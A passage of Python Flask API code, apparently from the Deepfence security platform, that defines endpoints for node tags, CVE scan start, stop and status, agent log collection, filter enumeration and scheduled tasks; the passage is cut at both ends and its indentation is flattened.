description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "add_tags")
return set_response(data=node.set_tags(tags, "add_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_ADD_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_ADD_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
def set_node_tags_in_db(node, tags, action):
node_name = ""
present_tags = []
node_tag = None
node_tags_list = []
image_parent_host_names = []
if node.type == constants.NODE_TYPE_HOST:
node_name = node.host_name
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
if node.type == constants.NODE_TYPE_CONTAINER:
node_name = node.docker_container_id
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
node_name = node.image_name_tag
for parent in node.node_details_formatted.get("parents", []):
if parent.get("type", "") == constants.NODE_TYPE_HOST and parent.get("label", ""):
image_parent_host_names.append(parent["label"])
node_tags_list = NodeTags.query.filter(NodeTags.host_name.in_(image_parent_host_names),
NodeTags.node_name == node_name, NodeTags.node_type == node.type).all()
if node_tags_list:
present_tags = str(node_tags_list[0].tags).split(",")
if action == "add_tags":
present_tags.extend(tags)
present_tags = list(set(present_tags))
elif action == "delete_tags":
for tag in tags:
if tag in present_tags:
present_tags.remove(tag)
if present_tags:
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER:
if not node_tag:
node_tag = NodeTags(host_name=node.host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
host_node_tag_map = {node_tag.host_name: node_tag for node_tag in node_tags_list}
for parent_host_name in image_parent_host_names:
if parent_host_name in host_node_tag_map:
node_tag = host_node_tag_map[parent_host_name]
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
node_tag = NodeTags(host_name=parent_host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
if node_tag:
node_tag.delete()
if node_tags_list:
for node_tag in node_tags_list:
node_tag.delete()
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_DELETE_TAGS, methods=["POST"],
endpoint="api_v1_5_delete_tags")
@jwt_required
@non_read_only_user
def delete_tags(node_id):
"""
Node Control API - Delete User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: deleteUserDefinedTags
description: Delete given tags from this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Delete given tags from this node
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Delete given tags from this node
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "delete_tags")
return set_response(data=node.set_tags(tags, "delete_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_DELETE_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_DELETE_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_START, methods=["POST"],
endpoint="api_v1_5_start_cve")
@jwt_required
@non_read_only_user
def start_cve(node_id):
"""
Node Control API - Start CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: startCVE
description: Start CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Options to start cve
schema:
type: object
properties:
scan_type:
type: array
uniqueItems: true
description: Base and language specific scan types
example: ["base"]
items:
type: string
enum: [base, java, python, ruby, php, nodejs, js, dotnet]
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
post_data = {}
if request.is_json:
post_data = request.json
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
scan_types = post_data.get("scan_type", None)
if not scan_types or type(scan_types) != list:
scan_types = constants.CVE_SCAN_TYPES
else:
scan_types = list(set(scan_types + ["base"]) & set(constants.CVE_SCAN_TYPES))
scan_this_cluster = bool(post_data.get("scan_this_cluster", False))
scan_this_namespace = bool(post_data.get("scan_this_namespace", False))
mask_cve_ids = post_data.get("mask_cve_ids", [])
if scan_this_cluster:
if node.type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER]:
raise InvalidUsage("scan_this_cluster option available for images")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
if scan_this_namespace:
if node.type != constants.NODE_TYPE_CONTAINER:
raise InvalidUsage("scan_this_namespace option available for for containers only")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
"scan_types": scan_types,
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_START, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
df_id_to_scope_id_map = {}
topology_hosts_data = {}
topology_containers_data = {}
from config.redisconfig import redis
if scan_this_cluster or scan_this_namespace:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node.type.upper())
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_HOST + "?format=deepfence")[1])
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_CONTAINER + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_hosts_data = json.loads(redis_resp[1])
if redis_resp[2]:
topology_containers_data = json.loads(redis_resp[2])
if scan_this_cluster:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
# Scan all hosts in the cluster
for host_node_id, host_details in topology_hosts_data.items():
if host_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id:
try:
host_node = Node(host_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_hosts_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, host_node.host_name)
redis_pipe.incr(lock_key)
node_list.append(host_node)
redis_lock_keys.append(lock_key)
except:
pass
# Scan all container images in the cluster
image_scan_started = []
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
redis.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
elif scan_this_namespace:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
image_scan_started = []
current_namespace = node.container_name.split("/")[0]
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag") \
and container_details.get("container_name"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
k8s_namespace = container_details["container_name"].split("/")[0]
if k8s_namespace != current_namespace:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
redis.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
else:
lock_key = ""
if node.type == constants.NODE_TYPE_HOST:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.host_name)
else:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.image_name_tag)
redis_resp = redis.incr(lock_key)
if redis_resp != 1:
raise DFError("CVE scan on this node is already in progress")
resp = False
try:
resp = node.cve_scan_start(scan_types, ",".join(mask_cve_ids))
except Exception as ex:
redis.delete(lock_key)
raise ex
time.sleep(1)
redis.delete(lock_key)
return set_response(data=resp)
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_START,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_START, err))
raise InvalidUsage(err.message)
except Exception as ex:
# import traceback
# track = traceback.format_exc()
# print(track)
raise InternalError(str(ex))
@resource_api.route("/get_logs", methods=["POST"], endpoint="api_v1_5_get_logs_from_agents")
@jwt_required
@admin_user_only
def get_logs_from_agents():
"""
API to get the agent logs
"""
payloads = request.json
node_id_list = payloads.get('node_id_list', None)
if not node_id_list:
raise InvalidUsage("node_id_list must not be empty")
if type(node_id_list) != list:
raise InvalidUsage("node_id_list must be list of node ids")
node_type = payloads.get('node_type', None)
if node_type != "host":
raise InvalidUsage("node_type must be host")
topology_data_df_format = {}
try:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
if not topology_data_df_format:
raise DFError("No agents data available")
except Exception as e:
raise InvalidUsage(e)
random_string = get_random_string(10)
download_path = os.path.join("/tmp/deepfence-logs-download", random_string)
mkdir_recursive(download_path)
zip_path = os.path.join("/tmp/deepfence-logs", random_string)
mkdir_recursive(zip_path)
def get_logs_from_agents_task(node_id):
try:
eventlet.monkey_patch()
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
applicable_scans_api_url = constants.SCOPE_HOST_API_CONTROL_URL.format(
probe_id=node.probe_id, host_name=node.host_name, action="get_logs_from_agent")
with eventlet.Timeout(10):
resp = requests.post(applicable_scans_api_url, data='{}', verify=False)
response_data = resp.json()
if resp.status_code != 200:
raise InvalidUsage("Error: could not get logs from agent")
for single_file_info in response_data["agent_logs"]:
host_download_path = os.path.join(download_path, node.host_name)
mkdir_recursive(host_download_path)
f = open(os.path.join(host_download_path, single_file_info["file_name"]), "w+")
f.write(single_file_info["data"])
f.close()
except:
pass
processes = []
num_of_thread = 20
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
for node_id in node_id_list:
p = multiprocessing.Process(target=get_logs_from_agents_task, args=(node_id,))
processes.append(p)
try:
for i in chunks(processes, num_of_thread):
for j in i:
j.start()
for j in i:
j.join()
except Exception as e:
raise InvalidUsage(e)
if not os.listdir(download_path):
raise InvalidUsage("logs has not been generated")
subprocess.run("tar -C {0} -zcvf {1}/deepfence-agent-logs.tar.gz .".format(download_path, zip_path), shell=True)
rmdir_recursive(download_path)
# from tasks.reaper_tasks import delete_old_agent_logs
# delete_old_agent_logs.delay(zip_path)
return send_from_directory(zip_path, filename="deepfence-agent-logs.tar.gz", as_attachment=True), 200
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STOP, methods=["POST"],
endpoint="api_v1_5_stop_cve")
@jwt_required
@non_read_only_user
def stop_cve(node_id):
"""
Node Control API - Stop CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: stopCVE
description: Stop CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_STOP, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
return set_response(data=node.cve_scan_stop())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STOP,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STOP, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STATUS, methods=["GET"],
endpoint="api_v1_5_cve_status")
@jwt_required
def cve_status(node_id):
"""
Node Control API - CVE Status
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: cveStatus
description: CVE Status for a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_cve_status())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STATUS,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STATUS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ATTACK_PATH, methods=["GET"],
endpoint="api_v1_5_attack_path")
@jwt_required
def get_attack_path(node_id):
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_attack_path())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ATTACK_PATH, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ATTACK_PATH, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<node_id>", methods=["GET"], endpoint="api_v1_5_node_details")
@jwt_required
def get_node_detail(node_id):
"""
Node Details API
---
tags:
- Node Control
security:
- Bearer: []
operationId: nodeDetails
description: Get full details of a node (hosts, containers, images, processes) by node_id
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node(node_id)
return set_response(node.node_details_formatted)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/enumerate_filters", methods=["GET"], endpoint="api_v1_5_enumerate_filters")
@jwt_required
def enumerate_node_filters():
"""
Enumerate Filters API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateFilters
description: Get filter options for enumerate nodes api
parameters:
- name: node_type
in: query
type: string
required: true
description: Node type
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
- name: resource_type
in: query
type: string
required: true
description: Resource type
enum: [cve]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
# number, time_unit, lucene_query_string => used in vulnerability filters, not topology
number = request.args.get("number")
time_unit = request.args.get("time_unit")
if bool(number is not None) ^ bool(time_unit):
raise InvalidUsage("Require both number and time_unit or ignore both of them.")
if number:
try:
number = int(number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if time_unit and time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
lucene_query_string = request.args.get("lucene_query")
if lucene_query_string:
lucene_query_string = urllib.parse.unquote(lucene_query_string)
node_types_str = str(request.args.get("node_type", ''))
node_types = []
if node_types_str:
node_types = node_types_str.split(",")
filters_needed = request.args.get("filters", None)
resource_types_str = str(request.args.get('resource_type', ''))
resource_types = []
if resource_types_str:
resource_types = resource_types_str.split(",")
resource_filters = []
for resource_type in resource_types:
if resource_type not in [constants.CVE_INDEX]:
print('Invalid resource_type {}. Skipping'.format(resource_type))
continue
if resource_type == constants.CVE_INDEX:
# Get `container` info from `cve` and `host` / `container_image` data from `cve-scan`
cve_aggs = {"cve_container_name": {
"terms": {"field": "cve_container_name.keyword", "size": constants.ES_TERMS_AGGR_SIZE}}}
cve_filters = {"type": constants.CVE_INDEX}
cve_aggs_query = ESConn.aggregation_helper(
constants.CVE_INDEX, cve_filters, cve_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, get_only_query=True)
cve_scan_aggs = {
"node_type": {
"terms": {"field": "node_type.keyword", "size": 10},
"aggs": {"node_id": {"terms": {"field": "node_id.keyword", "size": ES_TERMS_AGGR_SIZE}},
"node_status": {"terms": {"field": "action.keyword", "size": ES_TERMS_AGGR_SIZE}}}
}
}
cve_scan_aggs_query = ESConn.aggregation_helper(
constants.CVE_SCAN_LOGS_INDEX, {"action": ["COMPLETED", "ERROR"]}, cve_scan_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, add_masked_filter=False,
get_only_query=True)
search_queries = [
{"index": constants.CVE_INDEX}, cve_aggs_query,
{"index": constants.CVE_SCAN_LOGS_INDEX}, cve_scan_aggs_query
]
aggs_responses = ESConn.msearch(search_queries).get("responses", [])
filters_actions = []
filters_host_name = []
filters_container_name = []
filters_image_name = []
for container_bkt in aggs_responses[0].get("aggregations", {}).get(
"cve_container_name", {}).get("buckets", []):
if container_bkt["key"] and container_bkt["key"] not in filters_container_name:
filters_container_name.append(container_bkt["key"])
for node_type_bkt in aggs_responses[1].get("aggregations", {}).get("node_type", {}).get("buckets", []):
for node_id_bkt in node_type_bkt.get("node_id", {}).get("buckets", []):
if node_type_bkt["key"] == constants.NODE_TYPE_HOST:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_host_name:
filters_host_name.append(node_id_bkt["key"])
elif node_type_bkt["key"] == constants.NODE_TYPE_CONTAINER_IMAGE:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_image_name:
filters_image_name.append(node_id_bkt["key"])
for scan_action_bkt in node_type_bkt.get("node_status", {}).get("buckets", []):
if scan_action_bkt["key"] and scan_action_bkt["key"] not in filters_actions:
filters_actions.append(scan_action_bkt["key"])
if filters_host_name:
details = {"label": "Hostname", "name": "host_name", "options": filters_host_name, "type": "string"}
if node_types:
if constants.NODE_TYPE_HOST in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_image_name:
details = {"label": "Image Name", "name": "image_name_with_tag", "options": filters_image_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER_IMAGE in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_container_name:
details = {"label": "Container Name", "name": "container_name", "options": filters_container_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_actions:
details = {"label": "Status", "name": "action", "options": filters_actions, "type": "string"}
resource_filters.append(details)
node_types = [constants.NODE_TYPE_HOST]
filters_needed = "kubernetes_cluster_name"
if filters_needed:
filters_needed = str(filters_needed).split(",")
if not node_types:
raise InvalidUsage("node_type is required")
filter_keys = []
for node_type in node_types:
if node_type not in constants.NODE_TYPES_ALL:
raise InvalidUsage("node_type '{0}' is invalid".format(node_type))
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
registry_id = request.args.get("registry_id")
if not registry_id:
raise InvalidUsage("registry_id is required")
filter_keys.append("{0}{1}:{2}".format(constants.TOPOLOGY_FILTERS_PREFIX, node_type.upper(), registry_id))
else:
filter_keys.append(constants.TOPOLOGY_FILTERS_PREFIX + node_type.upper())
from config.redisconfig import redis
topology_filters = redis.mget(filter_keys)
response = {"filters": []}
added_filters = {}
added_count = 0
for topology_filter in topology_filters:
if not topology_filter:
continue
filter_items = json.loads(topology_filter)
for item in filter_items:
to_add = False
if filters_needed:
if item["name"] in filters_needed:
to_add = True
else:
to_add = True
if to_add:
if item["name"] in added_filters:
found_index = added_filters[item["name"]]
tmp_options = list(set(item["options"] + response["filters"][found_index]["options"]))
response["filters"][found_index]["options"] = tmp_options
else:
response["filters"].append(item)
added_filters[item["name"]] = added_count
added_count += 1
merged_filters = []
# if node_types are passed remove filters generated by resource_type which are not applicable to node_types
if resource_filters and response.get('filters'):
merged_filters = resource_filters + response.get('filters')
# merged_filters = list(filter(lambda x: x.get('name') in [y.get('name') for y in response.get('filters')],
# resource_filters))
elif node_types and response.get('filters'):
merged_filters = response.get('filters')
else:
merged_filters = resource_filters
filter_index = {}
for resource_filter in merged_filters:
if resource_filter.get('name') in filter_index:
existing_resource_filter = filter_index[resource_filter.get('name')]
existing_options = set(existing_resource_filter.get('options'))
current_options = set(resource_filter.get('options'))
new_options = current_options - existing_options
updated_options = existing_resource_filter.get('options') + list(new_options)
existing_resource_filter['options'] = updated_options
else:
filter_index[resource_filter.get('name')] = resource_filter
all_filters = [value for value in filter_index.values()]
all_filters.sort(key=lambda x: x.get('name'))
return set_response(data={'filters': all_filters})
@resource_api.route("/scheduled_tasks", methods=["GET"], endpoint="api_v1_5_scheduled_tasks_list")
@jwt_required
def list_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: getScheduledTasks
description: Get list of all scheduled tasks
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
scheduled_tasks = Scheduler.query.order_by(Scheduler.created_at.asc()).all()
if not scheduled_tasks:
scheduled_tasks = []
response = {"scheduled_tasks": [{
"id": task.id, "created_at": str(task.created_at), "action": task.action, "description": task.description,
"cron": task.cron_expr, "status": task.status, "last_ran_at": str(task.last_ran_at),
"node_names": task.node_names, "is_enabled": task.is_enabled, "node_type": task.nodes.get("node_type", "")
} for task in scheduled_tasks]}
return set_response(data=response)
@resource_api.route("/scheduled_tasks/update", methods=["POST"], endpoint="api_v1_5_scheduled_tasks_update")
@jwt_required
@non_read_only_user
def update_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: updateScheduledTasks
description: Enable, disable or delete scheduled tasks
parameters:
- in: body
name: Options
description: Options to enable, disable or delete scheduled tasks
schema:
type: object
properties:
action:
type: string
enum: [enable, disable, delete]
description: Action to perform - `enable`, `disable` or `delete`
scheduled_task_id_list:
type: array
uniqueItems: true
required: true
description: List of scheduled task ids
example: [1,3,5]
items:
type: integer
responses:
201:
description: Updated successfully.
400:
description: Bad request.
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
action = request.json.get("action", "enable")
if action not in ["enable", "disable", "delete"]:
raise InvalidUsage("action must be enable, disable or delete")
scheduled_task_id_list = request.json.get("scheduled_task_id_list")
if not scheduled_task_id_list:
raise InvalidUsage("scheduled_task_id_list is required")
if type(scheduled_task_id_list) != list:
raise InvalidUsage("scheduled_task_id_list must be list")
if action == "delete":
Scheduler.bulk_delete_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)))
else:
is_enabled = True
if action == "disable":
is_enabled = False
Scheduler.bulk_update_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)), is_enabled)
return set_response(status=201)
@resource_api.route("/node_action", methods=["POST"], endpoint="api_v1_5_node_action")
@jwt_required
def node_action():
"""
Node Action API
---
tags:
- Node Action
security:
- Bearer: []
operationId: nodeAction
description: Start or schedule scan, get reports, etc for a set of nodes
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
node_type:
type: string
required: true
description: Node type
enum: [host, container, container_image, registry_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
action:
type: string
required: true
description: Node type
enum: [cve_scan_start, cve_scan_status, schedule_vulnerability_scan, download_report, send_report]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
raise InvalidUsage("Missing JSON post data in request")
node_type = post_data.get("node_type", None)
if node_type not in constants.NODE_BULK_ACTIONS:
raise InvalidUsage("node_type {0} not supported".format(node_type))
action = post_data.get("action", None)
if action not in constants.NODE_BULK_ACTIONS[node_type]:
raise InvalidUsage("action {0} not supported for node_type {1}".format(action, node_type))
current_user = get_jwt_identity()
user = User.query.filter_by(id=current_user["id"]).one_or_none()
if action != constants.NODE_ACTION_DOWNLOAD_REPORT:
if user.role.name not in [constants.USER_ROLES.ADMIN_USER, constants.USER_ROLES.NORMAL_USER]:
raise Forbidden("User not permitted to perform this action")
node_ids = post_data.get("node_id_list", [])
if type(node_ids) != list:
node_ids = []
registry_images = post_data.get("registry_images", {})
if type(registry_images) != dict:
registry_images = {}
from config.redisconfig import redis
df_id_to_scope_id_map = {}
topology_data_df_format = {}
include_dead_nodes = bool(post_data.get("include_dead_nodes", False))
node_action_details = {"node_type": node_type, "include_dead_nodes": include_dead_nodes}
action_args = post_data.get("action_args", {})
if action_args and type(action_args) != dict:
raise InvalidUsage("action_args should be in json format")
if not action_args:
action_args = {}
accepted_action_args = ["cron", "description", "scan_type", "filters", "resources",
"report_email", "duration", "registry_credentials", "delete_resources"]
action_args = {k: v for k, v in action_args.items() if k in accepted_action_args}
filters = action_args.get("filters", {})
if type(filters) != dict:
raise InvalidUsage("action_args.filters must be a json")
if filters:
node_action_details["filters"] = filters
# "filters", "resources", "report_email" - for download report / send report
# resources - [{"type":"cve","filter":{"cve_severity":["critical"]}}]
